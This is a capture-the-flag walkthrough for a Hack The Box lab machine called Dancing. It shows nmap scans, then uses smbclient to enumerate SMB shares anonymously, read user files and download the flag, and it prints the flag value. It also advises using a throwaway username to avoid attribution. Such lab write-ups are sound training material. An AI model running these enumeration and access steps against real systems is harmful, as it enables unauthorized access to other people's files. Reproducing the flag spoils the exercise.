03.DANCING (SMB)

OVERVIEW

Target Service:	                  SMB
Attack:                           Anonymous Access
Vulnerability:                    Anonymous Access
MITRE Tactics & Technques:	  

Summary: The target system exposed several SMB shares, accessible via anonymous access
         with no proper authentication hardening. A list of shares was retrieved using 
         showing several administrative and custom shares (ADMIN$, C$, IPC$, and 
         WorkShares). The WorkShares share was accessible, containing directories for 
         users.

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@oco:~$ nmap -sV -T4 10.129.13.4 -p-
 PORT     STATE SERVICE       VERSION
 135/tcp   open  msrpc         Microsoft Windows RPC
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds?
 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc         Microsoft Windows RPC
 49665/tcp open  msrpc         Microsoft Windows RPC
 49666/tcp open  msrpc         Microsoft Windows RPC
 49667/tcp open  msrpc         Microsoft Windows RPC
 49668/tcp open  msrpc         Microsoft Windows RPC
 49669/tcp open  msrpc         Microsoft Windows RPC
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 * think of port 445 (smb) as an active share that can be accessed/explored if it is
   running on the target

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.13.4 -p 445
 PORT   STATE SERVICE VERSION
 445/tcp open  microsoft-ds?

 Host script results:
 | smb2-security-mode: 
 |   3:1:1: 
 |_    Message signing enabled but not required
 |_clock-skew: 3h59m59s
 | smb2-time: 
 |   date: 2025-01-22T01:28:31
 |_  start_date: N/A

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.13.4 -p 445
 445/tcp open  microsoft-ds

 Host script results:
 |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
 |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
 |_smb-vuln-ms10-054: false

 Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 445
    - e.g., weak smb configurations, or known vulnerabilities in the smb service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag

#list shares
root@htb:~$ smbclient -L 10.129.13.4 -U anonymous -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	WorkShares      Disk      

  Reconnecting with SMB1 for workgroup listing.
  do_connect: Connection to 10.129.13.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
  Unable to connect with SMB1 -- no workgroup available

 * the -L is used to get a list of shares available on a host
 * the -U is used to supply a username to use during connection
 * the -N is used to ignore password request

 * if the attacker doesn't provide a username, the smbclient will use the attacker's
   local machine username which is the one the attacker is currently logged in with
    - this is bad OPSEC
       - since no known username has been acquired, either leave the username
         blank (Bad OPSEC) or at least submit ANY username to prevent attribution

 * ADMIN$ - Administrative shares are hidden network shares created by the 
    Windows NT family of operating systems that allow system administrators to
    have remote access to every disk volume on a network-connected system. 
    These shares may not be permanently deleted but may be disabled.
   C$ - Administrative share for the C:\ disk volume. This is where the 
    operating system is hosted.
   IPC$ - The inter-process communication share. Used for inter-process 
    communication via named pipes and is not part of the file system.
   WorkShares - Custom share.
   
//connect to each share to see what can be accessed
root@htb:~$ smbclient \\\\10.129.13.4\\ADMIN$ -U admin -N
 tree connect failed: NT_STATUS_ACCESS_DENIED

 * the NT_STATUS_ACCESS_DENIED output means the share requires proper
   credentials to access/connect

root@htb:~$ smbclient \\\\10.129.13.4\\C$ -U admin -N
 tree connect failed: NT_STATUS_ACCESS_DENIED

 * the IPC$ can be ignored as it doesn't have any value and is non browsable

root@htb:~$ smbclient \\\\10.129.13.4\\WorkShares -U admin -N
 Try "help" to get a list of possible commands.
smb: \> help
 ?              allinfo        altname        archive        backup         
 blocksize      cancel         case_sensitive cd             chmod          
 chown          close          del            deltree        dir 
 ...
 
smb: \> ls
 Amy.J                               D        0  Mon Mar 29 04:08:24 2021
 James.P                             D        0  Thu Jun  3 03:38:03 2021

smb: \> cd Amy.J\
smb: \Amy.J\> ls
  worknotes.txt                       A       94  Fri Mar 26 06:00:37 2021
smb: \Amy.J\> more worknotes.txt 
 - start apache server on the linux machine
 - secure the ftp server
 - setup winrm on dancing 

smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
  flag.txt                            A       32  Mon Mar 29 04:26:57 2021
smb: \James.P\> get flag.txt
smb: \James.P\> exit
root@htb:~$ cat flag.txt 
 5f61c10dffbc77a704d76016a22f1664

Previous02.FAWN (FTP)Next04.REDEEMER (REDIS DB - ANONYMOUS ACCESS)

Last updated 1 month ago